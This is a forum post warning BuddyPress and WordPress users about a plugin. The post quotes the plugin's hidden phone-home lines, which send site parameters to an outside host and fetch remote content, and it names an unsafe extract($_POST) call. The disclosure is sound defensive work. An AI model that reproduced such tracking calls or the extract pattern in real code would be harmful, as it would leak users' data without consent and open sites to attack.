Hi BP people,
i want to warn you against wp-contacts-directories plugin. This plug is recently updated and works with WP and WPMU/BP…. If you already use it, uninstall it.
If you know what you do, take care of it because this plugin contains many security holes (for ex. extract($_POST);…) and a spy code line 556 to 562 who contains something like this:
$res = file_get_contents("http://ahlul.web.id/tools/plugcheck/?n=$n&h=$h&m=$e");
in another if statement, line 577, we find :
$output = file_get_contents("http://ahlul.web.id/tools/plugads/wpcontact.php");
This is illegal as far as i know…
Anyway this is a perfect example of what not to do in matter of security, php and open source coding.
Of course i also post this on the WP forum.
- The topic ‘Security warning’ is closed to new replies.